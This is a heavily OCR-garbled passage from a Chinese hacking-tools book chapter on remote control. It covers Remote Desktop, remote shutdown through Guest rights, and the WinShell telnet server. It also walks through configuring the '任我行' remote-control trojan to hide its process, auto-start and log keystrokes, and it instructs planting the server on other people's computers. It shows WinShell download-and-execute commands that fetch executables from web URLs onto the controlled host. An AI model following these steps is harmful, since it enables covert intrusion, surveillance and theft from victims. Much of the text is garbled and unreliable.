选择 此 对 象 类 型 6) : 
用 户 或 内 置 安全 主体 
查找 位 置 ff): 
4LBQD1ETPGKVSI 


输入 对 象 名 称 来 选择 撑 剖 ) 邓 ): 


| 榨 查 名 称 CC) 


高 级 心 ).. 


在 文本 框 中 输入 对 象 名 称 并 单 击 “ 确 定 ” 按 钮 。 
STEP07: 返回 “系统 属性 ”对 话 框 


系统 保护 | 远程 
远程 协助 
允 计 远程 协助 广 接 这 全 计算 机 外 ) 


远程 点 面 
单 击 一 个 选项 ， 然 后 指定 谁 可 以 过 接 如 果 需 要 )。 


单 击 “ 确 定 ” 按 钮 。 


STEP09: 常规 设置 


ER 后 


-i 


输入 远程 计算 机 的 名 称 。 


计算 机 总 ): ”192. 168.1.10 
用 户 名 : Administrator 
当 您 连接 时 将 向 您 询问 和 任 据 。 
证 | 多 许 我 保存 任 据 名 ) 


选择 “开始 " >“ 所 有 程序 "> " 附 国 单 击 “ 选 ” 输 入 计算 机 IP 地 址 以 及 用 户 名 , 若 用 户 要 保存 凭证 ， 


件 ”>“ 远 程 桌 面 连接 ”菜单 命令 。 项 ”按钮 。 


可 勾 选 “人 允许 我 保存 凭证 ” 复 选 框 。 
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Fi 


工具 全 攻略 
PE 


STEP10: 至 示 设 置 STEP11: 本 地 资源 设置 


总 选择 远程 点 面 的 大 小 。 将 滑 块 拖 动 到 最 右边 来 使 用 全 屏 B) 。 
小 辐 一 大 
1440 x 900 像素 
[| 将 我 的 所 有 监视 器 用 于 远程 会 话 上 ) 


En 示例 : ALt+Tab 
本 地 设备 和 资 参 
园 eth (T) z 剪贴 板 工 ) 
设置 远程 桌面 显示 的 大 小 、 颜 色 质 量 。 设置 远程 计算 机 的 声音 及 会 话 中 使 用 的 设备 和 资源 。 


STEP12: 选择 连接 速度 STEP13: 登录 到 Windows 


输入 您 的 凭 握 
人 这些 凭据 梅 用 于 连接 192.168.1.10。 


线束 丁字 256 - 2 Mbps) 
= 开间 Mbps — 16 了 局 志 ,) 
i 和 癌 延 迟 ) 
局 域 b4 (10 hbps 或 日 襄 ) ””， 
同 拖 动 时 显示 窗口 内 容 (8) 
加 菜单 和 窗口 动画 出 ) 
贺 视觉 样式 0 
回 持 名 位 图 摆 存 全) 
图 如果 连 接 中 断 ， 刚 重新 莫 接 伍 ) 


加 选 珊 @) 


国 选择 远程 连接 的 速度 (建国 单 击 “连接 " 按 国 输入 用 户 名 和 登录 密码 。 国 单 击 “确定 "按钮 。 
和 (10Mbps 或 更 ” 钮 ， 进 行 远 程 桌面 


高 ))。 连接 。 
STEP14: 登录 到 远程 计算 机 桌面 STEP15: ”对 远程 桌面 进行 操作 


马 192.168.1.10 - 远程 桌面 连接 L 一 一 -- 机 192.168.1.10 - 远程 桌面 连接 


Ek Ek i: 


S 可 用 , 共 史 1 M8 
etc 于 GD) 
] NSN 上 的 BR 


5 


4 其 好 (1) 
去 从 家 
双击 渗 行 硅 度 云 芝 家 


8QD1ETPGKVSIW 


nT ee pr 
Es 


I 人 WORKGROUP 
义理 吕 : Pentgum(R) Dusl-Core 


Ee | i 图 标 ， 就 可 打开 “计算 机 ”窗口 。 
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STEP16: 断 开 远程 果 面 连接 
在 本 地 计算 机 中 单 击 远程 桌面 连接 窗口 上 的 “ 关 
闭 ” 按 钮 。 


用 ” 行 。 可 以 通过 再 次 登录 得 后 重新 连接 刘 此 会 话 。 


国 在 弹出 的 “远程 案 面 连接 "对话 框 中 单 击 “ 确 定 ， 
按钮。 


机 的 用 户 必须 设置 密码 ， 否则 将 不 能 正常 使 用 远程 果 面 连接 
进行 远程 果 面 连接 时 ， 远 程 计算 机 用 户 将 不 能 登录 ， 登 录 即 断 开 


13.1.2 Windows 系统 远程 关机 


一 般 情 况 下 ， 访 问 其 他 计算 机 时 若 只 拥有 Guest 用 户 权 限 ， 此 时 若 要 执行 远程 关闭 
计算 机 的 操作 ， 就 会 出 现 拒绝 访问 的 提示 。 为 此 ， 用 户 需要 修改 被 远程 关闭 的 计算 机 中 
的 Guest 用 户 的 操作 权限 。 

具体 的 操作 方法 如 下 。 

STEP01: 打开 “运行 ”对 话 框 STEP02: 打开 “本 地 组 策略 编辑 器 ”窗口 


S| 本 地 组 策 政 编辑 器 
文件 (F) ”操作 (A) ”各 看 (V) ”性 助 (H) 
包 中 | 方 国 日 怠 | 日 到 


策略 安全 设置 
一 ”Windows 将 根据 您 所 办 入 的 名 称 , 为 您 打开 相应 的 程序 . ona haminiacetors sock 
| / 创建 符号 链接 Administrators 
WO 文件 卖 、 文 樟 或 Internet 资源 。 创建 全 局 对 象 LOCAL SERVICE,NET. 
创建 一 个 令 乏 对 急 
创建 一 个 页 面 文件 Administr 
创建 未 久 共享 对 条 
引 || 多 从 扩展 雹 上 取 下 计算 机 Administrators,Users 


打开 (OY: gpedit.msd| 
如” 使 用 管理 权限 创建 此 任务 . 


2 从 网 终 访 问 此 计算 机 veryone,Administrat... L | 


*S-1-5-21-172812453,,, 


选择 “开始 ”> 四 输入 “gpedit.msc” 命 令 展开 “计算 机 配置 " > "Vindows 双击 “从 远程 
“运行 ”菜单 命令 。 后 单 击 “确定 ”按钮 。 设置 ” >“ 安 全 设置 ”>“ 本 地 策略 ” 系统 强制 关机 

>“ 用 户 权 限 分 配 ” 节 点 。 选项 。 
STEP03: 添加 Guest 用户 STEP04: 输入 “cmd” 命令 


本 地 安全 设置 
3 贱 。 从 远程 系统 强制 关机 


三 周 过 


区 Windows 将 恨 据 您 所 樟 入 的 名 称 ， 为 您 打开 相应 的 程序 、 
一 文件 夹 、 文 档 或 Internet 资源 。 


打开 (O): cmd 


4L3QD1ETFGEVS1W Guest 
Cd 
添加 用 户 或 组 0). .| | _ 昨 除 名) 


将 Guest 用 户 添加 到 用 户 或 组 列表 框 中 。 在 文本 框 中 输入 "omd" 命令 * 国 单 击 "确定 " 按钮。 


国 ”使 用 管理 权限 创建 此 任务 。 
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客 过 
区 -工具 人 攻 了 


全 人 人 他 
STEP05: 打开 命令 提示 符 窗 口 


管理 员 : C'\Windows\system32\cmd.exe 


Microsoft Windows [I 本 6.1-?7681 ] a 
有 版权 所 有 ce> 2002 Microsoft CokDpokhation 。 怪 留 所 有 权利 


输入 “shutdown -s-m \ 远 程 计算 机 名 -t30 ”命令 ， 
其 中 “30” 为 关闭 延迟 时 间 。 


被 关闭 的 计算 机 屏幕 上 将 显示 “系统 关机 ”对 话 框 ， 被 关闭 计算 机 的 操作 员 可 输入 
“shutdown -a” 命 令 中 止 关 机 任务 。 


13:1.3 ”区 别 远 程 宁 面 连接 与 远程 协助 


“远程 协助 ”是 Windows 附 市 提供 的 一 种 远程 控制 方法 。 远 程 协 助 的 发 起 者 通过 MSN 
Messenger (或 Windows Messenger) 回 Messenger 中 的 联系 人 发 出 协助 要 求 ， 在 获得 对 方 
同意 后 即 可 进行 远程 协助 ， 远 程 协助 中 被 协助 方 计算 机 将 暂时 受 协助 方 〈 在 远程 协助 程序 
中 被 称 为 专家 ) 的 控制 ， 专 家 可 在 航 探 计算 机 中 进行 系统 维护 、 安 猴 软 件 、 处 理 计 算 机 中 
的 某 些 问 题 或 回 饭 协助 者 演示 某 些 操作 。 

使 用 “远程 协助 ”时 还 可 以 通过 癌 邀 请 方 发 送 电 子 邮 件 等 方式 进行 ， 且 通过 “帮助 和 文 持 ” 
口 能 够 否 看 到 邀请 与 极 邀 请 的 有 天资 料 。 使 用 “远程 协助 ”进行 近 程 控制 必须 由 主 控 双 方 协 
同 才能 够 进行 ， 所 以 Windows 7 中 义 提 供 了 “远程 果 和 而 连接 ”控制 方式 。 

利用 “远程 加 和 面 连 接 ” 功 能 ， 用 户 可 在 远离 办 公 室 的 地 方 通 过 网 络 对 计算 机 进行 远程 
控制 ， 即 使 主机 处 在 无 人 状况 ,“ 远 程 加 和 面 连接 ”仍然 可 顺利 进行 。 远 程 用 户 可 通过 这 种 方 
式 使 用 计算 机 中 的 数据 、 应 用 程序 和 网 络 资源 ， 也 可 让 同事 访问 自己 的 计算 机 呆 面 ， 以 便 
于 进行 协同 工作 。 使 用 “远程 加 和 面 连接 ”功能 上 时， 人 饭 探 计算 机 用 户 不 能 使 用 目 己 的 计算 机 ， 
不 能 看 到 远程 操作 者 所 进行 的 操作 过 程 ， 且 远程 控制 者 具有 被 控 计 算 机 的 最 高 权限 。 


13.2 | 利用 ' 任 我 行 "软件 进行 远程 控制 曝光 


远程 控制 “ 任 我 行 ”是 一 球 拥 有 “正身 连接 ”和 “反问 连接 ”功能 的 远程 控制 软件 ， 
能 够 让 黑客 就 像 控 制 目 己 的 计算 机 一 样 控 制 远程 主机 。 该 软件 主要 有 远程 屏幕 监控 、 远 程 
语 首 视频 、 远 程 文件 管理 、 远 程 注 册 表 操作 、 远 程 键盘 记录 、 主 机 上 线 通 知 、 远 程 命令 控 
制 和 远程 信息 发 送 等 作用 。 


人 ,2.1 配置 服务 端 


远程 控制 软件 一 般 分 客户 问 (Client)〉 程序 和 服务 端 〈Server) 程序 两 部 分 ， 通 第 将 客户 
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远程 控 : 制 技术 


瘦 程序 安装 到 主 控 端的 计算 机 上 ， 将 服务 并 程 序 安装 到 被 控 咒 的 计算 机 上 。 使 用 时 客户 剖 程 
序 问 被 控 喘 计算 机 中 的 服务 端 程序 发 出 信号 ， 建 立 一 个 特殊 的 远程 服务 ， 通 过 这 个 远程 服务 
并 使 用 各 种 远程 控制 功能 发 送 远 程控 制 命令 ， 控 制 被 控 问 计算 机 中 的 各 种 应 用 程序 运行 。 


配置 服务 端的 具体 操作 步骤 如 下 。 
STEP01: 运行 “ 任 我 行 ”软件 STEP02: 选择 配置 类 型 
PHAR HHH ee 
请 选择 要 配置 的 服务 端 程 序 的 连接 类 型 ? 


正 向 浑 接 型 反 向 滨 接 型 
LE L 反 向 连接 型 。 


-如 何 选择 配置 类 
此 : 全 和 对 广 避 在 | es 


名 外 War 已 与 已、 


未 统 应 用 ET 二 配置 服 备 端 


2 E 


Ca ] 连接 密码 : 下 一 ED BE 
本 阳 守 自 下 程 语音 视 题 性命 邻 控 刁 注 册 表 挫 作 川 运程 | 程 立 件 管 下 


| 一 皮 向 连接 和 正 向 连接 都 可 以 使 用 

|z、 称 在 局 域 风 中， 对 方 是 AnsL 直 择 技 号 上 网 。 

| 一 请 合用 正 向 连 巡 _ 

您 起 o 直 拓 上 号 上 网 ， 对 方 在 局 域 网 或 者 网 吧 。 


使 用 
一 个 局 域 网 中 


[ 
四 
| 
| 
E 


辆 下 载 并 安装 “远程 控制 任 我 国 在 控制 界面 上 方 单 击 “ 正 向 连接 型 ”按钮 。 
行 软 件 ”， 安 装 完成 后 ， 双 击 “ 单 击 “ 配 置 服务 端 " 
快捷 图 标 。 按钮 。 


如 果 在 局 域 网 中 控制 ADSL 用 户 ,需要 选择 “ 正 向 连接 型 ?。 如 果 在 ADSL 
连接 中 控制 局 域 网 用 户 ， 需 要 选择 “有 反 疝 连接 型 ”。 


STEP04: 安装 信息 设置 


-一 服务 端 安装 路 径 : 
| 服务 端 安装 名 称 : ” [mall ex。 _ 回 
由 系统 托盘 处 显示 图 标 了] ” 厅 自动 陷 燕 安装 文件 


六 20007XP72003 系 统 中 隐 蔬 进程 Em 
让 无 木马 行为 特征 启动 服务 端 ” [3 ] 


服务 病 图 标 修改 


日 多 
“pi 


悍 存 路 径 : C:\Program Fil es 性 我 行 工 作 室 “ 远 PE 9 悍 存 略 径 ; IC:“Documents and Settines\Adminis po 生成 器 各党 


对 服务 器 程序 的 图 标 、 邮 件 设置 、 安 装 信息 、 启 下 国富 的 守 国 单 击 “ 生 成 服务 端 ” 按 
项 等 信息 进行 修改 。 、 安 装 名 称 以 及 显示 钮 ， 在 程序 根 目 录 下 生成 一 
态 等 信息 /Eo "服务 器 端 程序 .exe” 程序 。 


将 生成 的 服务 并 程序 植 入 被 控制 的 机 器 中 并 运行 ， 植 入 后 ,“ 服 务 右 病程 序 .exe” 会 日 
动 删 除 ， 只 在 系统 中 保留 ZRundlll. exe 进程 ， 并 在 每 次 开机 时 目 动 局 动 。 
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Pe 
全 人 人 他 
13;2.2 ”通过 服务 端 程 序 进行 远程 控制 曝光 


服务 端 程序 被 植 入 他 人 计算 机 中 并 运行 后 ， 即 可 在 自己 的 计算 机 中 运行 客户 端 并 对 服 
务 病 进行 控制 了 ， 具 体 的 操作 步 又 如 下 。 


工具 全 攻略 


STEP01: 在 客户 端 启动 “ 任 我 行 ” STEP02: 成 功 连接 远程 计算 机 


LA WA OO) f 冬 程 Wu” DD 


-一 -sd | 人 | | 同一 


192. 168.0.10 有 |123 | iD:e | | 园 断 开 | 
| 过 径 进 程 坦 者 上 远程 语言 说 频 儿 远程 命令 控制 | 远程 未 统 信息 上 L 远 程 注册 表 操 作 | 
: 于 区 四 国 四 加 攻 机 “ 占 
| 二 一 一 一 一 -一 一 一 一 一 
2008/2/29 |0:34:14 
2009/6/4 中 :33:24 


2009/1/5 宰 :17:32 
2008/7/25 |6:59:20 
2010/3/6 :11:22 
加 System Yolume Information 2008/2/19 16:40:06 
口 尼 2009/4/8 $$:20:28 
DOD) $BRECYCLE. BIN 2009/5/12 B:40:00 
DDrive Inforaation 2008/7/25 16:10:38 


国 办 和 被 制 计 算 机 的 IP 地 址 ， 0 辆 单 击 “ 连 查看 远程 计算 机 单 击 “ 屏 幕 监视 ， 
填写 “连接 密码 ”和 “连接 端口 。 ” 接 ” 按 钮 。 的 所 有 分 区 。 按钮 。 


控 - 正 向 连接 STEP04: 使 用 远程 文件 管理 功能 


E 


STEP03: 屏幕 


Er 全 人 本 区 < 


账户 (Wj 文件 四 要 客 ( 炊 更 (Q 1 办 人 TU 


馈 宝贝 列表 页 -好 孕妇 屿 - 孕 
2 连接 主机 ; [92.168.0.10 | 和 = 123 -二 [ar78 本 二 [sf 
站 元 码 于 下 BE 本 下 医 注 册 表 过 人 


2009711712 12:31;52 
2009/11/12 12:31.52 
2009711712 12:31:50 
2009711712 12:31:54 
2009/11/10 9:37:20 
200871179 8:42:44 
2009711711 8:40:42 


ct A 
Ctrl+C 


三 & 
归 2010 时 尚 移 版 孕 籽 这 区 导 省 $ 侍 人 斌 色 汉 排 寞 各 外 孕妇 获 夏 禁 孕妇 村 出 连 六 
4 领 孚 EB 基色 基色 Ctrlty 


Ctrl+tD 
Ctrl+R 


¥ 60,00 元 


4 


国 半 二 “连接 " 按钮 ， 单 击 “ 键 盘 "“ 和 鼠标 " 按 ”浏览 受 控 计算 机 的 相应 文件 夹 , 找到 下 载 的 文件 后 ， 
裤 计 算 机 的 屏幕 便 。 钮 , 可 以 使 用 键盘 和 鼠标 右 击 该 文件 并 在 快捷 菜单 中 选择 “文件 下 载 ” 命 
已 在 记 本 站。 来 对 受 控 计算 机 上 的 程序 ” 令 ”， 可 下 载 受 控 计 算 机 文件 。 通 过 “文件 上 传 ” 命 
进行 操作 。 令 也 可 将 客户 端 计 算 机 上 的 文件 上 传 到 受 控 的 计算 

机 中 。 
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远程 控制 技术 


STEP06: 进程 查看 


可 在 “ 远程 桌面 中 分 选 各 项 功能 ， 并 在 “ 远程 关 显示 远程 主机 的 所 有 进程 ， 包 括 该 进程 的 线程 数 、 
机 ”“ 远 程 声音 ”中 单 击 各 个 按钮 进行 操作 。 优先 级 等 。 


© 如 果 对 当前 运行 的 某 个 进程 有 所 怀疑 ， 可 以 选中 该 进程 后 右 击 并 在 弹出 的 快捷 
菜单 中 选择 “结束 进程 ”命令 结束 该 进程 


是 砂 


用 WinShell 实现 远程 控制 曝光 


WinShell 是 一 个 运行 在 Windows 平台 上 的 Telnet 服务 器 软件 , 主 程序 是 一 个 仅仅 6KB 
大 小 的 可 执行 文件 ， 可 完全 独立 执行 而 不 依赖 于 任何 系统 动态 链接 库 。 筷 体积 很 小 ， 却 功 
能 强大 ， 文 持 定制 端口 、 密 人 码 保 护 、 多 用 户 登 录 、NT 服务 方式 、 远 程 文件 下 载 、 信 息 目 定 
义 及 独特 的 反 DDOS 等 功能 。 


13;3.1 配置 WinShell 


默认 状态 下 ,定制 WinShell 的 主 程序 会 生成 一 个 压缩 过 的 体积 很 小 的 WinShell 服务 端 ， 
当然 也 可 以 选择 不 压缩 ， 而 使 用 其 他 压缩 或 保护 程序 对 生成 的 WinShell 服务 端 进行 处 理 。 
有 具体 操作 步骤 如 下 。 
STEP01: 安装 并 运行 WinShell 


窗口 权限 配置 


第 一 步 
上 监听 庙 口 : 连接 密码 :116) 
5277 1 
和 连 接 密码 返回 信息 : (80) Mingr/Me/ WT/2K/IT) 
bam .03. 


Password: 


家 家 家 es com 


局 ah 务 名 字 。 服务 列表 名 字 0 | | 清二， 二 
ES 子 : 子 2 子 . 名 .Sb 
fwinskhsll Winshell Service Winshell] 配置 服务 新 。 


服务 掏 壕 : (80) 注意 : 
[Frovi de Windows Shell Service HETMN... ‘Run\ReeKeyHame 


天 吉文 伯 地址: Bo) 是 藻 自 动 T 载 文件 ] 广 直人 
httipi /iwww. abe. com/ svr. exe 


下 载 J 的 文件 存 让 名 字 : (80) 


SVE. EXC 
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Ba Fa Ms 
全- 工具 全 攻略 


会 全 人 性 
1) 在 “监听 端口 ”文本 框 中 设置 即将 生成 的 服务 靖 运 行 后 的 交口 号 ， 轩 认为 5277。 
再 设 症 登录 服务 疾 时 需要 的 密 取 ， 黑 认为 无 密码 。 


“连接 密码 返回 信息 ”项 意 为 登录 WinShell 时 要 求 输入 密码 的 提示 信息 ， 默 


认为 “Password:”， 可 设置 为 空 ， 即 无 提示 信息 。 


2) 在 “服务 列表 名 字 ” 文 本 框 中 选择 默认 从 WinShell Service 之 后 ， 下 方 的 “服务 摘 
述 ” 项 是 指 显 示 在 NT 服务 列表 中 说 明 服 务 上 其 体 功 能 的 字符 串 ， 默 认为 “Provide Windows 
Shell Service”。 

3) 设置 服务 问 在 系统 中 以 服务 方式 运行 时 的 服务 名 学 ， 默 认为 WinShell。 

“注册 表 启 动 名 字 ” 项 是 指 在 安装 WinShell 时 , 为 了 在 系统 启动 后 能 自动 运 
© 行 ，WinShell 写 在 注册 表 路 径 HKEY LOCAL MACHINE\ SOFTWARE\ Micro 
提示 。 soft\Windows\CurrentVersion \Run 处 的 字符 串 名 ， 默 认为 WinShell， 其 值 也 为 字 

符 串 类 型 ， 如 “Ci:\windows\ winshell.exe”， 


4) 勾 选 “是 否 上 自动 安装 ” 复 选 枉 后 ， 单 击 “ 生 成 ”按钮 。 
STEP02: 查看 服务 端的 配置 信息 STEP03: 查看 WinShell 服务 端 信 息 


习 serverexe.txt - 记事 本 


i 砷 ”server,exe 屋 性 
文件 篇 每 (E) 格式 (O) 音 者 (V) 帮助 (H) 


FF | SEYVer. Exe 


六 件 类 型 : ”应 用 程序 【. exe) 
本: 


bm 
SerVver. Oe 


WinShell] Server Path : E:\ 黑 客 资 料 
\WinShell50\server. exe 
WinShell Server Size : 12832 Bytes 


位 置 : 
大 小 : 12.5 13 (2832 字 节 ) 


占用 空间 : 。 18. 二 (16, 384 字 节 ) 

创建 时 间 : ”2013 年 11 月 4 日 ，14:47:25 
修改 时 间 : ”2013 年 11 月 4 日 ，14:47:25 
访问 时 间 : ”201$ 年 11 月 4 日 ， 14:47:25 


回 中 读 @) 。 回 隐藏 加 
应 用 办 

从 弹出 的 文本 文件 中 可 以 看 到 生成 的 服务 端的 配置 ”生成 的 服务 端 文件 大 小 只 有 12.5KB。 

信息 。 


STEP04: 查看 WinShell 进程 


5 [L577 
,a 


JPassword = 
Password Banner : [Password:] 

Registry KeyName : [WinShel1] 

Service Name : [WinShell] 

Service DisplayName : [WinShell Service] 
Service Description : [Provide Windows Shell 
|Servicel] 

1DownExec Flag 

Url Address 

lIDestination Filename : 

Autolnstall Flag 


i 加 Windows 任务 管理 器 
文件 日” 选项 (O) 查看 (V) 帮助 (H) 


映像 名 称 用 户 名 


dServer. exe Admin. . . 
riliqguicke... 上 Admln... 


SearchInde... SYSTEM : 笔者 设计 的 WinShell 是 一 个 非常 小 巧 方便 的 Telnet 
Yer exe Manin 0 1D kK server, ced 服务 器 软件 ， 而 不 是 木马 程序 ， 所 以 WinShell 的 进 
Sct... |， .| 程 并 没有 隐藏 。 
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STEP05: 使 用 Telnet 命令 与 远程 计算 机 连接 STEP06: 输入 正确 的 密码 


管理 员 : C\Windows\system32\cmd.exe Telnet 192.168.59.128 


Microsoft Windows [hh 本 6-1-?76991] | : 
版 权 所 有 《cy 2899 Microsoft Corporation。 保 留 所 有 权利 。 Welcome to Microsoft Telnet Service 


CG:\Jsers vohn>2cd\ login: hacker 
password: 4 
G:~“>telnet i192.168.59 .128 


执行 命令 telnet 服务 器 IP 5277”， 然 后 按 (Enter〉 输入 用 户 名 并 按 〈 Enter〉 键 ， 然 后 输入 正确 的 密 
键 。 码 并 按 (Enter 》 键 。 


STEP07: ”成功 登录 远程 计算 机 STEP08: 查看 显示 的 反馈 信息 


司 chinese:txt - 沁 事 本 


加 Telnet 192.168.59.128 文件 (月 ”编辑 {E) 格式 (D】 查看 (V) ”帮助 (H) 
WinShell v5.0 (C)2002 janker .org 


? for help 
pr . e 》 
7E 汉 Microsoft Telnet Client . ee 

a a i Install 
六 Renove 

p Path 

b reBoot 

d shutDown 
5 Shell 

其 eXit 

q Quit 


NE, 当 J 仅 执 行 
功能 ， 往 恶 此 命 
e 9 - 


可 爱 的 “C:\> ”， 这 正 是 winshel1l 提 供 的 telnet 服 务 功能 ) 
和 比 命令 并 不 终止 winshe11 的 运行 ) 
行 ，; 比 命令 并 不 反 安 装 Winshell) 


了 上 1 ET 


Download : 


CHD>http:/y/ .../sru.exe 〔 通 过 http 下 载 其 他 网 站 上 的 文件 到 运行 winshell 的 机 展 上 ) 


C:\winnt\winshell .exe 
2。CHD>http:y7www.janker-org/hello .exe 
Download to C:\winnt\hello.exe... 

DOKY 


3. CHO>S 
Microsoft Windows 2000 [Uersion 5.00.2195] 
《C) Copyright 1985-2000 Microsoft Corp. 


C:\WINNT\> 


可 看 到 的 界面 就 是 远程 主机 为 Telnet 终 端 用 户 打开 ”在 命令 行 中 输入 “?” 并 按 “Enter) 键 查看 可 以 操 
的 命令 提示 符 窗口 , 在 该 窗口 中 输入 的 命令 将 会 作 的 命令 ， 通 过 反馈 信息 得 知 可 以 使 用 哪些 命令 。 
接 在 远程 计算 机 上 执行 。 


显然 ， 服 务 端 的 制作 是 十 分 方便 的 ， 而 对 系统 资源 的 占用 却 是 很 小 的 ， 加 之 操作 命令 
并 不 复杂 ， 因 此 ， 需 要 进行 远程 管理 的 朋友 可 尝试 使 用 WinShell 来 完成 任务 。 


13;3.2 买 现 远程 控制 星光 
当 配置 好 WinShell 服务 器 并 在 被 控 端 计算 机 中 运行 后 ， 用 户 可 在 主 控 端 计算 机 中 利用 
命令 提示 符 窗口 输入 有 关 Telnet 命令 与 远程 计算 机 建立 连接 ， 并 进行 控制 。 
具体 的 操作 方法 如 下 。 
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客 过 
-区 -工具 人 攻 了 


合 人 他 他 


STEP01: 成功 建立 连接 


By Telnet 192.168.0.16 


Winshell u5 -0 《C220062 janker.org 


? A0 
CMD>。 


cMD>http://.../srv.exe 


? for help 
CMD> 


将 已 配置 的 WinShell 服务 器 复制 到 远程 计算 机 中 可 查看 WinShell 的 所 有 命令 参数 。 
并 运行 。 在 主 控 端 计算 机 命令 提示 符 窗口 中 运行 
“Telnet 服务 器 |P 5277” 命 令 ， 即 可 成 功 连 接 。 


WinShell 命令 参数 及 其 功能 如 下 。 

i Install: 远程 安装 功能 。 

r Remove: 远程 反 安 装 功能 ， 此 命令 并 不 终止 WinShell 的 运行 。 
p Path: 查看 WinShell 主 程序 的 路 径 信息 。 

b reBoot: 重新 启动 远程 计算 机 ，。 

d shutdown: 关闭 远程 计算 机 。 

s Shell: WinShell 提供 的 Telnet 服务 功能 。 

x exit: 退出 本 次 登录 会 话 ， 但 此 命令 不 终止 WinShell 的 运行 。 
q Quit: 终止 WinShell 的 运行 。 此 命令 不 反 安 装 WinShell。 


STEP03: 执行 “s” 命 令 


画 Telnet 192.168.0.16 | © 


显示 远程 计算 机 的 盘 符 信息 。 此 时 主 控 端 就 可 以 控 
ee) 也 闪 "2000 Naerosope ons 制 远 程 计算 机 了 。 


13.4 用 QuicklP 进行 多 点 控制 曝光 


如 果 想 尝试 一 下 “一 台 计 算 机 同时 管理 和 控制 多 台 计算 机 、 多 台 计 算 机 也 同时 管理 一 台 计 
算 机 ”这 样 的 “多 点 ”控制 ，QuickIP 无 疑 是 一 个 很 好 的 选择 。QuickIP 可 用 于 服务 器 管理 、 远 
程 资源 共享 、 网 吧 机 器 管理 、 远 程 办 公 、 远 程 教育 、 排 除 故障 、 远 程 监控 等 多 种 应 用 场合 。 


13.4.1 设置 QUiekIP 服务 器 端 


由 于 QuickIP 是 将 服务 融 冰 与 客户 站 合并 在 一 起 的 ， 因 此 无 论 在 哪 台 计 算 机 上 都 是 一 
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起 安 厂 服务 喜 峭 和 客户 中 ， 这 也 是 实现 一 侣 服务 器 可 以 同时 被 多 台 客 户 机 控制 、 一 个 客户 
机 同时 控制 多 台 服 务 占 的 前 提 条 件 。 配 置 QuickIP 服务 局 站 的 具体 操作 步骤 如 下 。 


STEP01: 运行 QuicklP 服务 器 STEP02: 设 定 登录 密码 提示 信息 
讽 安装 - QuickIP 一 | QuickIP 服务 器 


安装 程序 已 经 将 QuicklP 安装 到 您 的 机 器 。 您 可 以 选择 运 
行 安装 的 程序 。 


请 点 击 完成 -退出 安装 程序 。 
加 | 立即 运行 QuicklIP 服 务 器 


是 立即 运 [7QuickIP 容 户 机 人 SRS 有 设置 本 务 器 的 访问 庆 码 , 为 了 安全 ,请 立即 修改 挛 三 。 


国 选中 “立即 运行 OQuicklP 辆 单 击 “ 完 成 ” 单 击 “ 确 定 ”按钮 。 
服务 器 ” 复 选 框 。 按钮 。 
STEP03: 修改 密码 


皮 修改 本 地 服务 器 的 密码 


QuickIP 服务 次 


服务 器 状态 : 正 运行 
服务 器 信息 : DtETPORYSIN L192. 168. 1. 10:7314 192. 168. 160. 1:7314 


连接 的 客户 机 : 0 服务 器 日 志 : 


根据 提示 输入 密码 并 单 击 确 “” 单 击 “ 确 定 ”按钮 。 可 以 看 到 “服务 器 启动 成 功 ”的 字样 。 
认 ” 按 钮 。 


13,:4.2 设置 Quicki 客户 站 


客户 并 的 设置 束 相 对 简单 了 ， 主 要 是 添加 服务 器 端的 操作 。 具 体 的 操作 步 缀 如 下 。 
STEP01: 添加 服务 器 STEP02: 查看 已 添加 的 IP 地 址 


冰 QuickiP 宕 户 机 区 Quickip 客户 机 
| 注册 软件 “文件 工具 ”信息 ”帮助 注册 软件 文件 工具 信息 “帮助 


| 号 二 时 加 噬 绵 @ E 县 x 二 | 叭 9 起 Do ‘Eh | 
添加 主机 3 主机 列表 扫描 主机 屏幕 控制 网 络 电 话 主机 信息 配置 ”本 地 录音 录 信 让 于 添加 主机 取消 主机 列表 扫描 主机 屏幕 控制 网 络 电话 主机 信息 | 配置 ”本 地 录音 录像 回 埃 者 | 
| 全 选择 主机 [ET 3 | 加 其 QuickIP 瘤 选择 主机 [192168017314 = | 向 其 QuickIP 


| 旦 -加 | 远程 控制 管理 器 


时 - 导 | 我 的 电脑 
团 - 铸 远程 主机 


起 只 1 


HH-… 掏 远程 主机 的 服务 列表 (for Windows 2000/NT/XP only) 
, -| 国 | 远程 主机 的 工作 站 列表 (for Windows 2000/NT/XP only) 
:… 图 访问 远程 主机 的 主页 


_192. 168. 0. 1:7314 项 数 =8 


国 单 击 工具 栏 中 的 辆 输入 远程 计算 机 的 IP 地 址 ， 单 击 已 添加 的 IP 地 址 ， 从 展开 的 控制 功能 列表 中 可 
“添加 主机 ”按钮 。 以 及 在 服务 器 端 设置 的 端口 及 “看 到 远程 控制 功能 十 分 丰富 ， 表 示 客 户 端 与 服务 器 
密码 , 然后 单 击 “确认 ” 按钮。 端 连接 成 功 了 。 


Zi1l 


Pe > 
和- 工具 全 攻略 


合 人 他 他 


人 .4.3 买 现 远程 控制 明光 


下 面 来 看 看 如 何 进 行 远程 控制 (鉴于 QuickIP 的 功能 非常 强大 ， 只 讲 几 个 比较 第 用 的 
控制 操作 )， 具 体操 作 步 又 如 下 。 
STEP01: ”查看 远程 驱动 器 STEP02: 远程 屏幕 控制 


区 Quickip 客户 机 Sm 区 QuickiP 宪 户 机 
注册 软件 文件 工具 ”信息 帮助 注册 软件 ”文件 ”工具 ”信息 帮助 


汪 的 加 从 +? | 所 口 | 妆 的 加 们 妃 加 | 
添加 主机 Re 主机 列表 扫 据 主机 屏幕 控制 网 络 电话 主机 信息 | 配置 。 本 地 录音 pe 添加 主机 员 消 主机 列表 扫描 主机 屏幕 控制 网 络 电话 主机 信和 息 ”配置 。 本 地 录音 全 加 于 | 


委 选择 主机 硬 1680.1?314 i 合 茸 QuickIP : 选择 主机 192.168.10:7314 =| 向 经 QuickIP 
远程 控制 管理 器 殉 


日 - 忆 远程 主机 _ 由 - 恩 | 我 的 电脑 
四 -对 127.0.0.1:7314 日 -多 远程 主机 


5 和 .168. 0. 1.7314] 由 -四 127.0.0.1:7314 
U LA ED 


由 多 192. 168.0.1:7314 
白 地 地 188. 1.0:7314 


一 上 琴音 控制 
mm ，- 留 着 远 和 的 了 和 器 程序 
-|192. 168.0. 1:7314 项 数 =8 | 


单 击 “ 远 程 磁盘 驱动 器 ”选项 ， 即 可 看 到 远程 计算 单 击 “ 屏 幕 控 制 ", 稍 后 会 看 到 远程 计算 机 桌面 ， 并 
机 中 的 所 有 驱动 器 。 且 可 通过 鼠标 和 键盘 对 远程 计算 机 的 控制 。 


如 果 远 程 计算 机 出 现 速 度 忽然 绥 慢 等 情况 ， 则 可 以 通过 单 击 “远程 主机 进 
